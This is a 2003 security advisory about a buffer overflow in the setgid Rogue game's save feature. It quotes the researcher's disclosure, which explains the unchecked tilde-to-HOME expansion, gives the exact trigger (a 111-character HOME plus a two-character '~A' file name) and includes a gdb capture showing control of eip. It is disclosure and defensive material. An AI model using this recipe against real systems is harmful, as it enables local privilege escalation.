Rogue Game Software Buffer Overflow Lets Local Users Obtain Elevated Privileges
SecurityTracker Alert ID: 1006152|
SecurityTracker URL: http://securitytracker.com/id/1006152
(Links to External Site)
Date: Feb 23 2003
Execution of arbitrary code via local system, User access via local system|
Exploit Included: Yes |
A buffer overflow vulnerability was reported in the Rogue game software. A local user may be able to obtain additional privileges.|
It is reported that the 'save game' feature contains a buffer overflow in the save_into_file() function in the 'save.c' file. A local user can reportedly set a specially crafted HOME environment variable and specify a file name that begins with a tilde ('~') when saving a game. Rogue will replace the tilde with the contents of the HOME environment variable without checking the length of the contents, according to the report.
A local user can overflow the buffer by filling the HOME environment variable with 111 characters and then saving a game with a file name that is two characters long (a tilde plus one additional character). Arbitrary code can be executed. Because the game is typically installed with set group id (setgid) 'games' group privileges, the local user can reportedly obtain 'games' group privileges.
A local user can execute arbitrary code with 'games' group privileges.|
No vendor solution was available at the time of this entry. The author of the report has provided an unofficial patch, available in the Source Message [the patch is Base64 encoded].|
Vendor URL: ibiblio.org/pub/Linux/games/dungeon/!INDEX.html (Links to External Site)
|Underlying OS: Linux (Any), UNIX (Any)|
Source Message Contents
Subject: [VulnWatch] Rogue buffer overflow|
Content-Type: TEXT/PLAIN; charset=US-ASCII
Rogue buffer overflow
VENDOR: Tim Stoehr et al.
DOWNLOAD URL: http://ibiblio.org/pub/Linux/games/dungeon/!INDEX.html
(any file called "*rogue*" in that directory)
Rogue is a text-based role-playing computer game with a long
history. It is the first of the rogue-like games.
Rogue's save game function (capital S) suffers from a buffer
overflow. The program is usually installed setgid games, so
successful exploitation means getting that group's access rights.
If you specify a file name for saving beginning with a tilde
(~), Rogue will replace that character with the contents of
the environment variable HOME. This happens in the function
save_into_file() in save.c. The concatenation of that environment
variable with the rest of the file name takes place in a buffer of
80 characters, and the code doesn't check if it is overrun or not.
We can exploit this by giving the HOME environment variable a value
that is 111 characters long, and by saving a game with a file name
that is two characters long: a tilde (~) and one more character. That
second character in the file name will be the highest byte in the
address that the processor jumps to. The other bytes in the address
come from the HOME environment variable.
Here is a session capture that illustrates this problem:
$ export HOME=`perl -e 'print "U" x 111;'`
$ gdb rogue
GNU gdb Red Hat Linux (5.2-2)
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of it under
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
This GDB was configured as "i386-redhat-linux"...
Starting program: /home/vsu/secwork/rogue/rogue
[rogue session snipped]
file name? ~A
problem accessing the save file
Program received signal SIGSEGV, Segmentation fault.
0x41555555 in ?? ()
#0 0x41555555 in ?? ()
Cannot access memory at address 0x55555555
(gdb) i r
eax 0x1f 31
ecx 0x656c69 6646889
edx 0xff646b68 -10196120
ebx 0x4213030c 1108542220
esp 0xbfffdd90 0xbfffdd90
ebp 0x55555555 0x55555555
esi 0x40013020 1073819680
edi 0xbfffde84 -1073750396
eip 0x41555555 0x41555555
eflags 0x10286 66182
COMMUNICATION WITH VENDOR:
The program seems to be unmaintained, so I wrote an unofficial
I have attached a patch that corrects this problem. I have patched
// Ulf Harnhammar
will audit PHP and Perl code for money
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="rogue.patch"
Content-Disposition: attachment; filename="rogue.patch"